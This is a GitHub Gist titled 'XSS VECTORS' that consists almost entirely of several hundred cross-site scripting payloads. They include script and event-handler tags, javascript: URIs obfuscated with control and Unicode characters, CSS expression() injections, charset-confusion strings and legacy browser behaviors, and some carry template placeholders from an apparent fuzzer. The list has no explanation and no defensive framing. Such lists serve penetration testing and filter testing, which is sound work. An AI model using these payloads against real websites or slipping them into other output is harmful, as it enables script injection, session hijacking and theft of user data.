Last active
April 20, 2021 12:44
-
-
Save betillogalvan/c560aa2821c3f0785e98a13c1f68ff5c to your computer and use it in GitHub Desktop.
XSS VECTORS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> | |
<audio src=1 href=1 onerror="javascript:alert(1)"></audio> | |
<video src=1 href=1 onerror="javascript:alert(1)"></video> | |
<body src=1 href=1 onerror="javascript:alert(1)"></body> | |
<image src=1 href=1 onerror="javascript:alert(1)"></image> | |
<object src=1 href=1 onerror="javascript:alert(1)"></object> | |
<script src=1 href=1 onerror="javascript:alert(1)"></script> | |
<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> | |
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> | |
<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> | |
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> | |
<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> | |
<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> | |
<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> | |
<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> | |
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> | |
<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> | |
<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> | |
<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> | |
<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> | |
<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> | |
<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> | |
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> | |
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> | |
<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> | |
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> | |
<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> | |
<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> | |
<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> | |
<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> | |
<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> | |
<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> | |
<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> | |
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> | |
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> | |
<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> | |
<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> | |
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> | |
<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> | |
<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> | |
<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> | |
<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> | |
<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> | |
<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> | |
<object onError object onError="javascript:javascript:alert(1)"></object onError> | |
<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> | |
<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> | |
<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> | |
<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> | |
<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> | |
<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> | |
<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> | |
<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> | |
<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> | |
<body onload body onload="javascript:javascript:alert(1)"></body onload> | |
<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> | |
<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> | |
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> | |
<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> | |
<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> | |
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> | |
<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> | |
<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> | |
<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> | |
<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> | |
\x3Cscript>javascript:alert(1)</script> | |
'"`><script>/* *\x2Fjavascript:alert(1)// */</script> | |
<script>javascript:alert(1)</script\x0D | |
<script>javascript:alert(1)</script\x0A | |
<script>javascript:alert(1)</script\x0B | |
<script charset="\x22>javascript:alert(1)</script> | |
<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> | |
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> | |
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> | |
--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> | |
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> | |
`"'><img src='#\x27 onerror=javascript:alert(1)> | |
<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> | |
"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> | |
<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<script>/* *\x2A/javascript:alert(1)// */</script> | |
<script>/* *\x00/javascript:alert(1)// */</script> | |
<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> | |
<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> | |
<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> | |
<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> | |
<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> | |
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF | |
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF | |
<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> | |
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> | |
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> | |
"'`><\x00img src=xxx:x onerror=javascript:alert(1)> | |
<script src="data:text/plain\x2Cjavascript:alert(1)"></script> | |
<script src="data:\xD4\x8F,javascript:alert(1)"></script> | |
<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> | |
<script src="data:\xCB\x8F,javascript:alert(1)"></script> | |
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF | |
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF | |
ABC<div style="x:expression\x00(javascript:alert(1)">DEF | |
ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF | |
ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF | |
ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\x09expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\x20expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF | |
ABC<div style="x:\x00expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF | |
ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF | |
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> | |
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x22onerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x09onerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x00onerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x27onerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x20onerror=javascript:alert(1)> | |
"`'><script>\x3Bjavascript:alert(1)</script> | |
"`'><script>\x0Djavascript:alert(1)</script> | |
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> | |
"`'><script>\xE2\x80\x81javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x84javascript:alert(1)</script> | |
"`'><script>\xE3\x80\x80javascript:alert(1)</script> | |
"`'><script>\x09javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x89javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x85javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x88javascript:alert(1)</script> | |
"`'><script>\x00javascript:alert(1)</script> | |
"`'><script>\xE2\x80\xA8javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> | |
"`'><script>\xE1\x9A\x80javascript:alert(1)</script> | |
"`'><script>\x0Cjavascript:alert(1)</script> | |
"`'><script>\x2Bjavascript:alert(1)</script> | |
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> | |
"`'><script>-javascript:alert(1)</script> | |
"`'><script>\x0Ajavascript:alert(1)</script> | |
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> | |
"`'><script>\x7Ejavascript:alert(1)</script> | |
"`'><script>\xE2\x80\x87javascript:alert(1)</script> | |
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> | |
"`'><script>\xE2\x80\xA9javascript:alert(1)</script> | |
"`'><script>\xC2\x85javascript:alert(1)</script> | |
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> | |
"`'><script>\xE2\x80\x83javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> | |
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> | |
"`'><script>\xE2\x80\x80javascript:alert(1)</script> | |
"`'><script>\x21javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x82javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x86javascript:alert(1)</script> | |
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> | |
"`'><script>\x0Bjavascript:alert(1)</script> | |
"`'><script>\x20javascript:alert(1)</script> | |
"`'><script>\xC2\xA0javascript:alert(1)</script> | |
"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> | |
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> | |
"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> | |
"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> | |
"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> | |
"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> | |
"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> | |
"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> | |
"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> | |
<script\x2F>javascript:alert(1)</script> | |
<script\x20>javascript:alert(1)</script> | |
<script\x0D>javascript:alert(1)</script> | |
<script\x0A>javascript:alert(1)</script> | |
<script\x0C>javascript:alert(1)</script> | |
<script\x00>javascript:alert(1)</script> | |
<script\x09>javascript:alert(1)</script> | |
`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x00=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x20=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x09=javascript:alert(1)> | |
<script>javascript:alert(1)<\x00/script> | |
<img src=# onerror\x3D"javascript:alert(1)" > | |
<input onfocus=javascript:alert(1) autofocus> | |
<input onblur=javascript:alert(1) autofocus><input autofocus> | |
<video poster=javascript:javascript:alert(1)// | |
<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> | |
<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X | |
<video><source onerror="javascript:javascript:alert(1)"> | |
<video onerror="javascript:javascript:alert(1)"><source> | |
<form><button formaction="javascript:javascript:alert(1)">X | |
<body oninput=javascript:alert(1)><input autofocus> | |
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> | |
<frameset onload=javascript:alert(1)> | |
<table background="javascript:javascript:alert(1)"> | |
<!--<img src="--><img src=x onerror=javascript:alert(1)//"> | |
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> | |
<![><img src="]><img src=x onerror=javascript:alert(1)//"> | |
<style><img src="</style><img src=x onerror=javascript:alert(1)//"> | |
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> | |
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> | |
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> | |
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> | |
<object data="data:text/html;base64,%(base64)s"> | |
<embed src="data:text/html;base64,%(base64)s"> | |
<b <script>alert(1)</script>0 | |
<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> | |
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> | |
<embed src="javascript:alert(1)"> | |
<img src="javascript:alert(1)"> | |
<image src="javascript:alert(1)"> | |
<script src="javascript:alert(1)"> | |
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x | |
<? foo="><script>javascript:alert(1)</script>"> | |
<! foo="><script>javascript:alert(1)</script>"> | |
</ foo="><script>javascript:alert(1)</script>"> | |
<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> | |
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> | |
<% foo><x foo="%><script>javascript:alert(1)</script>"> | |
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> | |
<img \x00src=x onerror="alert(1)"> | |
<img \x47src=x onerror="javascript:alert(1)"> | |
<img \x11src=x onerror="javascript:alert(1)"> | |
<img \x12src=x onerror="javascript:alert(1)"> | |
<img\x47src=x onerror="javascript:alert(1)"> | |
<img\x10src=x onerror="javascript:alert(1)"> | |
<img\x13src=x onerror="javascript:alert(1)"> | |
<img\x32src=x onerror="javascript:alert(1)"> | |
<img\x47src=x onerror="javascript:alert(1)"> | |
<img\x11src=x onerror="javascript:alert(1)"> | |
<img \x47src=x onerror="javascript:alert(1)"> | |
<img \x34src=x onerror="javascript:alert(1)"> | |
<img \x39src=x onerror="javascript:alert(1)"> | |
<img \x00src=x onerror="javascript:alert(1)"> | |
<img src\x09=x onerror="javascript:alert(1)"> | |
<img src\x10=x onerror="javascript:alert(1)"> | |
<img src\x13=x onerror="javascript:alert(1)"> | |
<img src\x32=x onerror="javascript:alert(1)"> | |
<img src\x12=x onerror="javascript:alert(1)"> | |
<img src\x11=x onerror="javascript:alert(1)"> | |
<img src\x00=x onerror="javascript:alert(1)"> | |
<img src\x47=x onerror="javascript:alert(1)"> | |
<img src=x\x09onerror="javascript:alert(1)"> | |
<img src=x\x10onerror="javascript:alert(1)"> | |
<img src=x\x11onerror="javascript:alert(1)"> | |
<img src=x\x12onerror="javascript:alert(1)"> | |
<img src=x\x13onerror="javascript:alert(1)"> | |
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> | |
<img src=x onerror=\x09"javascript:alert(1)"> | |
<img src=x onerror=\x10"javascript:alert(1)"> | |
<img src=x onerror=\x11"javascript:alert(1)"> | |
<img src=x onerror=\x12"javascript:alert(1)"> | |
<img src=x onerror=\x32"javascript:alert(1)"> | |
<img src=x onerror=\x00"javascript:alert(1)"> | |
<a href=javascript:javascript:alert(1)>XXX</a> | |
<img src="x` `<script>javascript:alert(1)</script>"` `> | |
<img src onerror /" '"= alt=javascript:alert(1)//"> | |
<title onpropertychange=javascript:alert(1)></title><title title=> | |
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> | |
<!--[if]><script>javascript:alert(1)</script --> | |
<!--[if<img src=x onerror=javascript:alert(1)//]> --> | |
<script src="/\%(jscript)s"></script> | |
<script src="\\%(jscript)s"></script> | |
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> | |
<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X | |
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> | |
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d | |
<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> | |
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> | |
<style>*[{}@import'%(css)s?]</style>X | |
<div style="font-family:'foo ;color:red;';">XXX | |
<div style="font-family:foo}color=red;">XXX | |
<// style=x:expression\28javascript:alert(1)\29> | |
<style>*{x:expression(javascript:alert(1))}</style> | |
<div style=content:url(%(svg)s)></div> | |
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X | |
<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> | |
<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X | |
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X | |
<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> | |
<x style="background:url('x;color:red;/*')">XXX</x> | |
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> | |
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> | |
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> | |
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> | |
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi | |
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> | |
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ | |
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > | |
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`> | |
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>> | |
<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> | |
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> | |
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> | |
<x style="behavior:url(%(sct)s)"> | |
<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> | |
<event-source src="%(event)s" onload="javascript:alert(1)"> | |
<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> | |
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=javascript:alert(1)>"> | |
<script>%(payload)s</script> | |
<script src=%(jscript)s></script> | |
<script language='javascript' src='%(jscript)s'></script> | |
<script>javascript:alert(1)</script> | |
<IMG SRC="javascript:javascript:alert(1);"> | |
<IMG SRC=javascript:javascript:alert(1)> | |
<IMG SRC=`javascript:javascript:alert(1)`> | |
<SCRIPT SRC=%(jscript)s?<B> | |
